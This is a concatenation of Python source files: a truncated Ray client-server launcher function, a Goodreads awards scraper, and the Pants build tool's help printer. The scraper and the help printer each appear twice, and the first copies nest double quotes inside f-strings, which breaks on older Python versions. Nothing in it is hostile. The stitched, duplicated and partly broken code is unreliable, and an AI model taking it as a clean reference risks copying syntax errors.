start_ray_client_server(redis_address, ray_client_server_port, stdout_file=None, stderr_file=None, redis_password=None, fate_share=None, server_type: str = "proxy", serialized_runtime_env: Optional[str] = None, session_dir: Optional[str] = None): """Run the server process of the Ray client. Args: ray_client_server_port (int): Port the Ray client server listens on. stdout_file: A file handle opened for writing to redirect stdout to. If no redirection should happen, then this should be None. stderr_file: A file handle opened for writing to redirect stderr to. If no redirection should happen, then this should be None. redis_password (str): The password of the redis server. server_type (str): Whether to start the proxy version of Ray Client. serialized_runtime_env (str|None): If specified, the serialized runtime_env to start the client server in. Returns: ProcessInfo for the process that was started. """ root_ray_dir = Path(__file__).resolve().parents[1] setup_worker_path = os.path.join(root_ray_dir, "workers", ray_constants.SETUP_WORKER_FILENAME) conda_shim_flag = ( "--worker-setup-hook=" + ray_constants.DEFAULT_WORKER_SETUP_HOOK) command = [ sys.executable, setup_worker_path, conda_shim_flag, # These two args are to use the shim process. "-m", "ray.util.client.server", "--redis-address=" + str(redis_address), "--port=" + str(ray_client_server_port), "--mode=" + server_type ] if redis_password: command.append("--redis-password=" + redis_password) if serialized_runtime_env: command.append("--serialized-runtime-env=" + serialized_runtime_env) if session_dir: command.append(f"--session-dir={session_dir}") process_info = start_ray_process( command, ray_constants.PROCESS_TYPE_RAY_CLIENT_SERVER, stdout_file=stdout_file, stderr_file=stderr_file, fate_share=fate_share) return process_info
import pandas as pd import time from bs4 import BeautifulSoup import requests import sys import random def get_headers(): """ Genera un diccionario con los datos del header. Incluye una lista de diferentes user agent de la cual elige uno de manera aleatoria. """ uastrings = [ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" ] headers = { "User-Agent": random.choice(uastrings), } return headers def get_categories(year): """ toma como entrada la url de los awards del año X y devuelve una lista de tuplas con el titulo de la categoria y la url del ganador y nominaciones de esta. Inputs: year: año de lectura Returns: list_cat: lista de tuplas (categoria, url) """ url_goodreads = 'https://www.goodreads.com' url_awards = f'{url_goodreads}/choiceawards/best-books-{year}' page_awards = requests.get(url_awards) soup_main = BeautifulSoup(page_awards.content, 'html.parser') elements = soup_main.find_all(class_ = 'category clearFix') list_cat = [] for elem in elements: element_category = elem.a.text.replace('\n', '') url_best_cat = f"{url_goodreads}{elem.a.get("href")}" list_cat.append((element_category, url_best_cat)) return list_cat def scrap_winner_page(winner_cat_url): """ Hace scraping a la pagina de la categoria y extrae el titulo, el numero de votos y la url (directorio) del libro. Inputs winner_cat_url: url de la pagina del ganador de categoria Returns: title: Titulo del libro num_votes: Numero de votos url_book: Directorio dentro de la url donde se encuentra la pagina del libro """ page_cat_winner = requests.get(winner_cat_url) soup_cat = BeautifulSoup(page_cat_winner.content, 'html.parser') title = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').text num_votes = int(soup_cat.find(class_ = 'greyText gcaNumVotes').text \ .replace(',', '') \ .replace('\n', '') \ .replace('votes', '')) url_book = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').get('href') return title, num_votes, url_book def get_databox(soup_book): """ Devuelve un diccionario con los datos del elemento databox de cada libro. Inputs: soup_book: elemento soup del libro Returns: dict_databox: diccionario con los resultados """ # leemos la tabla de boox data box: databox_key = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowTitle') databox_key = [elem.text.strip() for elem in databox_key] databox_value = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowItem') databox_value = [elem.text.strip() for elem in databox_value] dict_databox = {key:value for key, value in zip(databox_key, databox_value)} return dict_databox def load_data_category(cat_elem): """ Scrapea la url del libro ganador de una categoría y devuelve un diccionario con los datos Inputs: cat_elem: tupla de informacion [categoría, url] Returns: dict_book: Diccionario con la siguiente informacion: category: Categoria donde ha ganado el libro title: Titulo votes: Numero de votos author_name: Nombre del autor book_series: Saga a la que pertenece el libro rating_value: Puntuacion en goodreads num_ratings: Numero de valoraciones num_reviews: Numero de reviews list_genres: Lista de generos asociados al libro book_format: Formato del libro num_pages: Numero de paginas publish_date: Fecha de publicacion publisher: Editora de publicacion original_title: Titulo original isbn: ISBN edition_language: Idioma de la edicion setting: Lugar donde transcurre el libro num_awards: Numero de premios recibidos """ dict_book = {} url_goodreads = 'https://www.goodreads.com' name_cat = cat_elem[0] winner_cat_url = cat_elem[1] title, votes, url_book = scrap_winner_page(winner_cat_url) time.sleep(0.5) # ralentizar la velocidad de scrapeo url_book = f"{url_goodreads}{url_book}" dict_book['category'] = name_cat dict_book['title'] = title dict_book['votes'] = votes book_page = requests.get(url_book) soup_book = BeautifulSoup(book_page.content, 'html.parser') # autor try: author_name = soup_book.find(class_ = 'authorName').text except: author_name = soup_book.find(class_ = 'authorName')[0].text dict_book['author_name'] = author_name # book series try: book_series = soup_book.find('h2', id = "bookSeries").text.strip() except: # esto a lo mejor sobra # da error si no existe el valor de bookseries. se asigna None book_series = None # devuelve esto si no tiene serie # <h2 id="bookSeries"> # </h2> dict_book['book_series'] = book_series # rating numerico rating_value = soup_book.find(itemprop = "ratingValue").text.strip() dict_book['rating_value'] = rating_value # numero votaciones num_ratings = int(soup_book.find('meta' , itemprop = 'ratingCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_ratings'] = num_ratings # numero reviews num_reviews = int(soup_book.find('meta' , itemprop = 'reviewCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_reviews'] = num_reviews # generos de goodreads list_gen = [soup_tag.text for soup_tag in soup_book.find_all('a' , class_ = 'actionLinkLite bookPageGenreLink')] list_gen = '_'.join(list(dict.fromkeys(list_gen))) dict_book['list_genres'] = list_gen # tipo de tapa book_format = soup_book.find('span' , itemprop = 'bookFormat').text dict_book['book_format'] = book_format # numero de paginas num_pages = int(soup_book.find('span' , itemprop = 'numberOfPages') \ .text.split(' ')[0]) dict_book['num_pages'] = num_pages # fecha publicacion publish_date = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip().split('\n')[1] \ .strip() dict_book['publish_date'] = publish_date # nombre publicador publisher = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip() \ .split('\n')[2] \ .replace('by', '') \ .strip() dict_book['publisher'] = publisher # extraemos la tabla desplegable de informacion del libro databox = get_databox(soup_book) # titulo original try: original_title = databox['Original Title'] except: original_title = None dict_book['original_title'] = original_title # isbn si viene try: isbn = databox['ISBN'].split('\n')[0] except: # no esta en databox isbn = None dict_book['isbn'] = isbn # edition language try: edition_language = databox['Edition Language'] except: edition_language = None dict_book['edition_language'] = edition_language # setting try: setting = databox['Setting'] setting = setting.split('\n')[0].strip() except: setting = None dict_book['setting'] = setting # nº premios try: num_awards = len(databox['Literary Awards'] \ .replace('...more', ', ') \ .replace('\n', '') \ .replace('...less', '') \ .split(', ')) except: num_awards = None dict_book['num_awards'] = num_awards return dict_book if __name__ == '__main__': if len(sys.argv) == 1: print("[ERROR] Please give as input at least one year of data") else: year = int(sys.argv[1]) namefile = f'csv/goodreads_awards_{sys.argv[1]}.csv' print(f"[INFO] Reading awards data from year {year}...") list_cat = get_categories(year) dict_book_list = [] for cat_elem in list_cat: print(f"[INFO] + category: {cat_elem[0]}") dict_book_result = load_data_category(cat_elem) dict_book_list.append(dict_book_result) if len(dict_book_list) > 0: df_result_year = pd.DataFrame([pd.Series(elem) for elem in dict_book_list]) df_result_year['year'] = year print(f'[INFO] savng csv file: {namefile}') df_result_year.to_csv(namefile, index = False) else: print(f'[ERROR] year {year} not found')
import pandas as pd import time from bs4 import BeautifulSoup import requests import sys import random def get_headers(): """ Genera un diccionario con los datos del header. Incluye una lista de diferentes user agent de la cual elige uno de manera aleatoria. """ uastrings = [ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25", "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/600.1.17 (KHTML, like Gecko) Version/7.1 Safari/537.85.10", "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" ] headers = { "User-Agent": random.choice(uastrings), } return headers def get_categories(year): """ toma como entrada la url de los awards del año X y devuelve una lista de tuplas con el titulo de la categoria y la url del ganador y nominaciones de esta. Inputs: year: año de lectura Returns: list_cat: lista de tuplas (categoria, url) """ url_goodreads = 'https://www.goodreads.com' url_awards = f'{url_goodreads}/choiceawards/best-books-{year}' page_awards = requests.get(url_awards) soup_main = BeautifulSoup(page_awards.content, 'html.parser') elements = soup_main.find_all(class_ = 'category clearFix') list_cat = [] for elem in elements: element_category = elem.a.text.replace('\n', '') url_best_cat = f"{url_goodreads}{elem.a.get('href')}" list_cat.append((element_category, url_best_cat)) return list_cat def scrap_winner_page(winner_cat_url): """ Hace scraping a la pagina de la categoria y extrae el titulo, el numero de votos y la url (directorio) del libro. Inputs winner_cat_url: url de la pagina del ganador de categoria Returns: title: Titulo del libro num_votes: Numero de votos url_book: Directorio dentro de la url donde se encuentra la pagina del libro """ page_cat_winner = requests.get(winner_cat_url) soup_cat = BeautifulSoup(page_cat_winner.content, 'html.parser') title = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').text num_votes = int(soup_cat.find(class_ = 'greyText gcaNumVotes').text \ .replace(',', '') \ .replace('\n', '') \ .replace('votes', '')) url_book = soup_cat.find(class_ = 'winningTitle choice gcaBookTitle').get('href') return title, num_votes, url_book def get_databox(soup_book): """ Devuelve un diccionario con los datos del elemento databox de cada libro. Inputs: soup_book: elemento soup del libro Returns: dict_databox: diccionario con los resultados """ # leemos la tabla de boox data box: databox_key = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowTitle') databox_key = [elem.text.strip() for elem in databox_key] databox_value = soup_book.find('div' , id = 'bookDataBox').find_all('div', class_ = 'infoBoxRowItem') databox_value = [elem.text.strip() for elem in databox_value] dict_databox = {key:value for key, value in zip(databox_key, databox_value)} return dict_databox def load_data_category(cat_elem): """ Scrapea la url del libro ganador de una categoría y devuelve un diccionario con los datos Inputs: cat_elem: tupla de informacion [categoría, url] Returns: dict_book: Diccionario con la siguiente informacion: category: Categoria donde ha ganado el libro title: Titulo votes: Numero de votos author_name: Nombre del autor book_series: Saga a la que pertenece el libro rating_value: Puntuacion en goodreads num_ratings: Numero de valoraciones num_reviews: Numero de reviews list_genres: Lista de generos asociados al libro book_format: Formato del libro num_pages: Numero de paginas publish_date: Fecha de publicacion publisher: Editora de publicacion original_title: Titulo original isbn: ISBN edition_language: Idioma de la edicion setting: Lugar donde transcurre el libro num_awards: Numero de premios recibidos """ dict_book = {} url_goodreads = 'https://www.goodreads.com' name_cat = cat_elem[0] winner_cat_url = cat_elem[1] title, votes, url_book = scrap_winner_page(winner_cat_url) time.sleep(0.5) # ralentizar la velocidad de scrapeo url_book = f"{url_goodreads}{url_book}" dict_book['category'] = name_cat dict_book['title'] = title dict_book['votes'] = votes book_page = requests.get(url_book) soup_book = BeautifulSoup(book_page.content, 'html.parser') # autor try: author_name = soup_book.find(class_ = 'authorName').text except: author_name = soup_book.find(class_ = 'authorName')[0].text dict_book['author_name'] = author_name # book series try: book_series = soup_book.find('h2', id = "bookSeries").text.strip() except: # esto a lo mejor sobra # da error si no existe el valor de bookseries. se asigna None book_series = None # devuelve esto si no tiene serie # <h2 id="bookSeries"> # </h2> dict_book['book_series'] = book_series # rating numerico rating_value = soup_book.find(itemprop = "ratingValue").text.strip() dict_book['rating_value'] = rating_value # numero votaciones num_ratings = int(soup_book.find('meta' , itemprop = 'ratingCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_ratings'] = num_ratings # numero reviews num_reviews = int(soup_book.find('meta' , itemprop = 'reviewCount') \ .text.strip() \ .split('\n')[0] \ .replace(',', '')) dict_book['num_reviews'] = num_reviews # generos de goodreads list_gen = [soup_tag.text for soup_tag in soup_book.find_all('a' , class_ = 'actionLinkLite bookPageGenreLink')] list_gen = '_'.join(list(dict.fromkeys(list_gen))) dict_book['list_genres'] = list_gen # tipo de tapa book_format = soup_book.find('span' , itemprop = 'bookFormat').text dict_book['book_format'] = book_format # numero de paginas num_pages = int(soup_book.find('span' , itemprop = 'numberOfPages') \ .text.split(' ')[0]) dict_book['num_pages'] = num_pages # fecha publicacion publish_date = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip().split('\n')[1] \ .strip() dict_book['publish_date'] = publish_date # nombre publicador publisher = soup_book.find('div' , id = 'details') \ .find_all('div', class_='row')[1] \ .text.strip() \ .split('\n')[2] \ .replace('by', '') \ .strip() dict_book['publisher'] = publisher # extraemos la tabla desplegable de informacion del libro databox = get_databox(soup_book) # titulo original try: original_title = databox['Original Title'] except: original_title = None dict_book['original_title'] = original_title # isbn si viene try: isbn = databox['ISBN'].split('\n')[0] except: # no esta en databox isbn = None dict_book['isbn'] = isbn # edition language try: edition_language = databox['Edition Language'] except: edition_language = None dict_book['edition_language'] = edition_language # setting try: setting = databox['Setting'] setting = setting.split('\n')[0].strip() except: setting = None dict_book['setting'] = setting # nº premios try: num_awards = len(databox['Literary Awards'] \ .replace('...more', ', ') \ .replace('\n', '') \ .replace('...less', '') \ .split(', ')) except: num_awards = None dict_book['num_awards'] = num_awards return dict_book if __name__ == '__main__': if len(sys.argv) == 1: print("[ERROR] Please give as input at least one year of data") else: year = int(sys.argv[1]) namefile = f'csv/goodreads_awards_{sys.argv[1]}.csv' print(f"[INFO] Reading awards data from year {year}...") list_cat = get_categories(year) dict_book_list = [] for cat_elem in list_cat: print(f"[INFO] + category: {cat_elem[0]}") dict_book_result = load_data_category(cat_elem) dict_book_list.append(dict_book_result) if len(dict_book_list) > 0: df_result_year = pd.DataFrame([pd.Series(elem) for elem in dict_book_list]) df_result_year['year'] = year print(f'[INFO] savng csv file: {namefile}') df_result_year.to_csv(namefile, index = False) else: print(f'[ERROR] year {year} not found')
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). import dataclasses import difflib import json import textwrap from typing import Dict, cast from typing_extensions import Literal from pants.base.build_environment import pants_version from pants.help.help_formatter import HelpFormatter from pants.help.help_info_extracter import AllHelpInfo, HelpJSONEncoder from pants.help.maybe_color import MaybeColor from pants.option.arg_splitter import ( AllHelp, HelpRequest, NoGoalHelp, ThingHelp, UnknownGoalHelp, VersionHelp, ) from pants.option.scope import GLOBAL_SCOPE class HelpPrinter(MaybeColor): """Prints general and goal-related help to the console.""" def __init__( self, *, bin_name: str, help_request: HelpRequest, all_help_info: AllHelpInfo, color: bool, ) -> None: super().__init__(color) self._bin_name = bin_name self._help_request = help_request self._all_help_info = all_help_info def print_help(self) -> Literal[0, 1]: """Print help to the console.""" def print_hint() -> None: print(f"Use `{self.maybe_green(self._bin_name + " help")}` to get help.") print(f"Use `{self.maybe_green(self._bin_name + " help goals")}` to list goals.") if isinstance(self._help_request, VersionHelp): print(pants_version()) elif isinstance(self._help_request, AllHelp): self._print_all_help() elif isinstance(self._help_request, ThingHelp): self._print_thing_help() elif isinstance(self._help_request, UnknownGoalHelp): # Only print help and suggestions for the first unknown goal. # It gets confusing to try and show suggestions for multiple cases. unknown_goal = self._help_request.unknown_goals[0] print(f"Unknown goal: {self.maybe_red(unknown_goal)}") did_you_mean = list( difflib.get_close_matches( unknown_goal, self._all_help_info.name_to_goal_info.keys() ) ) if did_you_mean: print(f"Did you mean: {", ".join(self.maybe_cyan(g) for g in did_you_mean)}?") print_hint() return 1 elif isinstance(self._help_request, NoGoalHelp): print("No goals specified.") print_hint() return 1 return 0 def _print_title(self, title_text: str) -> None: title = self.maybe_green(f"{title_text}\n{"-" * len(title_text)}") print(f"\n{title}\n") def _print_all_help(self) -> None: print(self._get_help_json()) def _print_thing_help(self) -> None: """Print a help screen. Assumes that self._help_request is an instance of OptionsHelp. Note: Ony useful if called after options have been registered. """ help_request = cast(ThingHelp, self._help_request) things = set(help_request.things) if things: for thing in sorted(things): if thing == "goals": self._print_goals_help() elif thing == "targets": self._print_targets_help() elif thing == "global": self._print_options_help(GLOBAL_SCOPE, help_request.advanced) elif thing in self._all_help_info.scope_to_help_info: self._print_options_help(thing, help_request.advanced) elif thing in self._all_help_info.name_to_target_type_info: self._print_target_help(thing) else: print(self.maybe_red(f"Unknown entity: {thing}")) else: self._print_global_help() def _print_goals_help(self) -> None: goal_descriptions: Dict[str, str] = {} for goal_info in self._all_help_info.name_to_goal_info.values(): if goal_info.is_implemented: goal_descriptions[goal_info.name] = goal_info.description self._print_title("Goals") max_width = max((len(name) for name in goal_descriptions.keys()), default=0) chars_before_description = max_width + 2 def format_goal(name: str, descr: str) -> str: name = self.maybe_cyan(name.ljust(chars_before_description)) description_lines = textwrap.wrap(descr, 80 - chars_before_description) if len(description_lines) > 1: description_lines = [ description_lines[0], *(f"{" " * chars_before_description}{line}" for line in description_lines[1:]), ] formatted_descr = "\n".join(description_lines) return f"{name}{formatted_descr}\n" for name, description in sorted(goal_descriptions.items()): print(format_goal(name, description)) specific_help_cmd = f"{self._bin_name} help $goal" print(f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific goal.\n") def _print_global_help(self): def print_cmd(args: str, desc: str): cmd = self.maybe_green(f"{self._bin_name} {args}".ljust(50)) print(f" {cmd} {desc}") print(f"\nPants {pants_version()}") print("\nUsage:\n") print_cmd( "[option ...] [goal ...] [file/target ...]", "Attempt the specified goals on the specified files/targets.", ) print_cmd("help", "Display this usage message.") print_cmd("help goals", "List all installed goals.") print_cmd("help targets", "List all installed target types.") print_cmd("help global", "Help for global options.") print_cmd("help-advanced global", "Help for global advanced options.") print_cmd("help [target_type/goal/subsystem]", "Help for a target type, goal or subsystem.") print_cmd( "help-advanced [goal/subsystem]", "Help for a goal or subsystem's advanced options." ) print_cmd("help-all", "Print a JSON object containing all help info.") print("") print(" [file] can be:") print(f" {self.maybe_cyan("path/to/file.ext")}") glob_str = self.maybe_cyan("'**/*.ext'") print( f" A path glob, such as {glob_str}, in quotes to prevent premature shell expansion." ) print("\n [target] can be:") print(f" {self.maybe_cyan("path/to/dir:target_name")}.") print( f" {self.maybe_cyan("path/to/dir")} for a target whose name is the same as the directory name." ) print( f" {self.maybe_cyan("path/to/dir:")} to include all targets in the specified directory." ) print( f" {self.maybe_cyan("path/to/dir::")} to include all targets found recursively under the directory.\n" ) print(f"Documentation at {self.maybe_magenta("https://www.pantsbuild.org")}") pypi_url = f"https://pypi.org/pypi/pantsbuild.pants/{pants_version()}" print(f"Download at {self.maybe_magenta(pypi_url)}") def _print_options_help(self, scope: str, show_advanced_and_deprecated: bool) -> None: """Prints a human-readable help message for the options registered on this object. Assumes that self._help_request is an instance of OptionsHelp. """ help_formatter = HelpFormatter( show_advanced=show_advanced_and_deprecated, show_deprecated=show_advanced_and_deprecated, color=self.color, ) oshi = self._all_help_info.scope_to_help_info.get(scope) if not oshi: return formatted_lines = help_formatter.format_options(oshi) goal_info = self._all_help_info.name_to_goal_info.get(scope) if goal_info: related_scopes = sorted(set(goal_info.consumed_scopes) - {GLOBAL_SCOPE, goal_info.name}) if related_scopes: related_subsystems_label = self.maybe_green("Related subsystems:") formatted_lines.append(f"{related_subsystems_label} {", ".join(related_scopes)}") formatted_lines.append("") for line in formatted_lines: print(line) def _print_targets_help(self) -> None: self._print_title("Target types") longest_target_alias = max( len(alias) for alias in self._all_help_info.name_to_target_type_info.keys() ) chars_before_description = longest_target_alias + 2 for alias, target_type_info in sorted( self._all_help_info.name_to_target_type_info.items(), key=lambda x: x[0] ): alias_str = self.maybe_cyan(f"{alias}".ljust(chars_before_description)) summary = target_type_info.summary or "<no description>" print(f"{alias_str}{summary}\n") specific_help_cmd = f"{self._bin_name} help $target_type" print( f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific " f"target type.\n" ) def _print_target_help(self, target_alias: str) -> None: self._print_title(target_alias) tinfo = self._all_help_info.name_to_target_type_info[target_alias] if tinfo.description: print(tinfo.description) print("\nValid fields:") for field in sorted(tinfo.fields, key=lambda x: x.alias): print() print(self.maybe_magenta(field.alias)) indent = " " required_or_default = "required" if field.required else f"default: {field.default}" print(self.maybe_cyan(f"{indent}type: {field.type_hint}")) print(self.maybe_cyan(f"{indent}{required_or_default}")) if field.description: for line in textwrap.wrap(field.description, 80): print(f"{indent}{line}") print() def _get_help_json(self) -> str: """Return a JSON object containing all the help info we have, for every scope.""" return json.dumps( dataclasses.asdict(self._all_help_info), sort_keys=True, indent=2, cls=HelpJSONEncoder )
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). import dataclasses import difflib import json import textwrap from typing import Dict, cast from typing_extensions import Literal from pants.base.build_environment import pants_version from pants.help.help_formatter import HelpFormatter from pants.help.help_info_extracter import AllHelpInfo, HelpJSONEncoder from pants.help.maybe_color import MaybeColor from pants.option.arg_splitter import ( AllHelp, HelpRequest, NoGoalHelp, ThingHelp, UnknownGoalHelp, VersionHelp, ) from pants.option.scope import GLOBAL_SCOPE class HelpPrinter(MaybeColor): """Prints general and goal-related help to the console.""" def __init__( self, *, bin_name: str, help_request: HelpRequest, all_help_info: AllHelpInfo, color: bool, ) -> None: super().__init__(color) self._bin_name = bin_name self._help_request = help_request self._all_help_info = all_help_info def print_help(self) -> Literal[0, 1]: """Print help to the console.""" def print_hint() -> None: print(f"Use `{self.maybe_green(self._bin_name + ' help')}` to get help.") print(f"Use `{self.maybe_green(self._bin_name + ' help goals')}` to list goals.") if isinstance(self._help_request, VersionHelp): print(pants_version()) elif isinstance(self._help_request, AllHelp): self._print_all_help() elif isinstance(self._help_request, ThingHelp): self._print_thing_help() elif isinstance(self._help_request, UnknownGoalHelp): # Only print help and suggestions for the first unknown goal. # It gets confusing to try and show suggestions for multiple cases. unknown_goal = self._help_request.unknown_goals[0] print(f"Unknown goal: {self.maybe_red(unknown_goal)}") did_you_mean = list( difflib.get_close_matches( unknown_goal, self._all_help_info.name_to_goal_info.keys() ) ) if did_you_mean: print(f"Did you mean: {', '.join(self.maybe_cyan(g) for g in did_you_mean)}?") print_hint() return 1 elif isinstance(self._help_request, NoGoalHelp): print("No goals specified.") print_hint() return 1 return 0 def _print_title(self, title_text: str) -> None: title = self.maybe_green(f"{title_text}\n{'-' * len(title_text)}") print(f"\n{title}\n") def _print_all_help(self) -> None: print(self._get_help_json()) def _print_thing_help(self) -> None: """Print a help screen. Assumes that self._help_request is an instance of OptionsHelp. Note: Ony useful if called after options have been registered. """ help_request = cast(ThingHelp, self._help_request) things = set(help_request.things) if things: for thing in sorted(things): if thing == "goals": self._print_goals_help() elif thing == "targets": self._print_targets_help() elif thing == "global": self._print_options_help(GLOBAL_SCOPE, help_request.advanced) elif thing in self._all_help_info.scope_to_help_info: self._print_options_help(thing, help_request.advanced) elif thing in self._all_help_info.name_to_target_type_info: self._print_target_help(thing) else: print(self.maybe_red(f"Unknown entity: {thing}")) else: self._print_global_help() def _print_goals_help(self) -> None: goal_descriptions: Dict[str, str] = {} for goal_info in self._all_help_info.name_to_goal_info.values(): if goal_info.is_implemented: goal_descriptions[goal_info.name] = goal_info.description self._print_title("Goals") max_width = max((len(name) for name in goal_descriptions.keys()), default=0) chars_before_description = max_width + 2 def format_goal(name: str, descr: str) -> str: name = self.maybe_cyan(name.ljust(chars_before_description)) description_lines = textwrap.wrap(descr, 80 - chars_before_description) if len(description_lines) > 1: description_lines = [ description_lines[0], *(f"{' ' * chars_before_description}{line}" for line in description_lines[1:]), ] formatted_descr = "\n".join(description_lines) return f"{name}{formatted_descr}\n" for name, description in sorted(goal_descriptions.items()): print(format_goal(name, description)) specific_help_cmd = f"{self._bin_name} help $goal" print(f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific goal.\n") def _print_global_help(self): def print_cmd(args: str, desc: str): cmd = self.maybe_green(f"{self._bin_name} {args}".ljust(50)) print(f" {cmd} {desc}") print(f"\nPants {pants_version()}") print("\nUsage:\n") print_cmd( "[option ...] [goal ...] [file/target ...]", "Attempt the specified goals on the specified files/targets.", ) print_cmd("help", "Display this usage message.") print_cmd("help goals", "List all installed goals.") print_cmd("help targets", "List all installed target types.") print_cmd("help global", "Help for global options.") print_cmd("help-advanced global", "Help for global advanced options.") print_cmd("help [target_type/goal/subsystem]", "Help for a target type, goal or subsystem.") print_cmd( "help-advanced [goal/subsystem]", "Help for a goal or subsystem's advanced options." ) print_cmd("help-all", "Print a JSON object containing all help info.") print("") print(" [file] can be:") print(f" {self.maybe_cyan('path/to/file.ext')}") glob_str = self.maybe_cyan("'**/*.ext'") print( f" A path glob, such as {glob_str}, in quotes to prevent premature shell expansion." ) print("\n [target] can be:") print(f" {self.maybe_cyan('path/to/dir:target_name')}.") print( f" {self.maybe_cyan('path/to/dir')} for a target whose name is the same as the directory name." ) print( f" {self.maybe_cyan('path/to/dir:')} to include all targets in the specified directory." ) print( f" {self.maybe_cyan('path/to/dir::')} to include all targets found recursively under the directory.\n" ) print(f"Documentation at {self.maybe_magenta('https://www.pantsbuild.org')}") pypi_url = f"https://pypi.org/pypi/pantsbuild.pants/{pants_version()}" print(f"Download at {self.maybe_magenta(pypi_url)}") def _print_options_help(self, scope: str, show_advanced_and_deprecated: bool) -> None: """Prints a human-readable help message for the options registered on this object. Assumes that self._help_request is an instance of OptionsHelp. """ help_formatter = HelpFormatter( show_advanced=show_advanced_and_deprecated, show_deprecated=show_advanced_and_deprecated, color=self.color, ) oshi = self._all_help_info.scope_to_help_info.get(scope) if not oshi: return formatted_lines = help_formatter.format_options(oshi) goal_info = self._all_help_info.name_to_goal_info.get(scope) if goal_info: related_scopes = sorted(set(goal_info.consumed_scopes) - {GLOBAL_SCOPE, goal_info.name}) if related_scopes: related_subsystems_label = self.maybe_green("Related subsystems:") formatted_lines.append(f"{related_subsystems_label} {', '.join(related_scopes)}") formatted_lines.append("") for line in formatted_lines: print(line) def _print_targets_help(self) -> None: self._print_title("Target types") longest_target_alias = max( len(alias) for alias in self._all_help_info.name_to_target_type_info.keys() ) chars_before_description = longest_target_alias + 2 for alias, target_type_info in sorted( self._all_help_info.name_to_target_type_info.items(), key=lambda x: x[0] ): alias_str = self.maybe_cyan(f"{alias}".ljust(chars_before_description)) summary = target_type_info.summary or "<no description>" print(f"{alias_str}{summary}\n") specific_help_cmd = f"{self._bin_name} help $target_type" print( f"Use `{self.maybe_green(specific_help_cmd)}` to get help for a specific " f"target type.\n" ) def _print_target_help(self, target_alias: str) -> None: self._print_title(target_alias) tinfo = self._all_help_info.name_to_target_type_info[target_alias] if tinfo.description: print(tinfo.description) print("\nValid fields:") for field in sorted(tinfo.fields, key=lambda x: x.alias): print() print(self.maybe_magenta(field.alias)) indent = " " required_or_default = "required" if field.required else f"default: {field.default}" print(self.maybe_cyan(f"{indent}type: {field.type_hint}")) print(self.maybe_cyan(f"{indent}{required_or_default}")) if field.description: for line in textwrap.wrap(field.description, 80): print(f"{indent}{line}") print() def _get_help_json(self) -> str: """Return a JSON object containing all the help info we have, for every scope.""" return json.dumps( dataclasses.asdict(self._all_help_info), sort_keys=True, indent=2, cls=HelpJSONEncoder )